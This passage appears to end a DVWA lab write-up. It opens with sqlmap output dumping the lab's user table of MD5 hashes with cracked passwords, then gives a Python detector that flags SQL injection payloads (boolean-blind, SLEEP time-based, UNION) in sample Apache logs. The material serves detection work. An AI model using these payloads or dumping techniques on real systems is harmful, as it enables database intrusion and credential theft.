[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/
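As an added defender-side example (not part of the original lab), the following Python script parses constructed Apache access-log lines whose query strings mirror the payload shapes sqlmap reported in the run above (boolean-based blind, time-based blind with SLEEP, UNION with hex-encoded markers) and flags them, while also counting flagged requests per client IP and noting clients that present sqlmap's default User-Agent. The log lines, IP addresses, and the assumption that the scanner sends its default `sqlmap/<version> (http://sqlmap.org)` User-Agent are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (Apache combined format). The id= values reproduce the
# shapes of the payloads sqlmap reported against DVWA, URL-encoded as a server
# would log them; the IPs and user agents are invented for this example.
SAMPLE_LOG = """
10.0.0.5 - - [26/May/2022:09:26:20 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.5 - - [26/May/2022:09:26:29 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20OR%20NOT%201427%3D1427%23&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.5.6.2#dev (http://sqlmap.org)"
10.0.0.5 - - [26/May/2022:09:26:40 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%205848%20FROM%20%28SELECT%28SLEEP%285%29%29%29ydqX%29--%20iPyQ&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.5.6.2#dev (http://sqlmap.org)"
10.0.0.5 - - [26/May/2022:09:26:40 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a6a7671%2C0x58%2C0x71787a7071%29%2CNULL%23&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.5.6.2#dev (http://sqlmap.org)"
10.0.0.9 - - [26/May/2022:09:30:01 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4300 "-" "Mozilla/5.0"
"""

# Apache "combined" log line: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures keyed to the injection techniques sqlmap identified in this run.
# The "sqlmap-marker" heuristic reflects the hex markers seen in the UNION
# payload above (0x717a6a7671 / 0x71787a7071: 5 bytes starting and ending in 'q').
SIGNATURES = [
    ("boolean-blind", re.compile(r"'\s*(OR|AND)\s+(NOT\s+)?\d+\s*=\s*\d+", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(FLOOR\s*\(\s*RAND|EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("union-query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("sqlmap-marker", re.compile(r"0x71[0-9a-f]{6}71", re.I)),
]


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_params(target):
    """Split the request target into URL-decoded (name, value) query pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(value):
    """Return the sorted list of technique names whose signature matches a decoded value."""
    return sorted(name for name, rx in SIGNATURES if rx.search(value))


def scan(log_text):
    """Scan a block of log text; return alerts, flagged-request counts per IP, and sqlmap-UA IPs."""
    alerts, per_ip, sqlmap_ua_ips = [], Counter(), set()
    for raw in log_text.splitlines():
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():      # default UA unless --random-agent/--user-agent is used
            sqlmap_ua_ips.add(rec["ip"])
        for param, value in decode_params(rec["target"]):
            techniques = classify(value)
            if techniques:
                alerts.append({"ip": rec["ip"], "ts": rec["ts"], "param": param,
                               "techniques": techniques, "value": value})
                per_ip[rec["ip"]] += 1
    return {"alerts": alerts, "per_ip": per_ip, "sqlmap_ua_ips": sqlmap_ua_ips}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for a in result["alerts"]:
        print(f"{a['ts']} {a['ip']} param={a['param']} {','.join(a['techniques'])}: {a['value']}")
    # A real sqlmap run generates thousands of requests (3725 in the lab above),
    # so the per-IP count is usually the loudest signal even without payload matches.
    print("flagged requests per IP:", dict(result["per_ip"]))
    print("clients with sqlmap User-Agent:", sorted(result["sqlmap_ua_ips"]))
```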
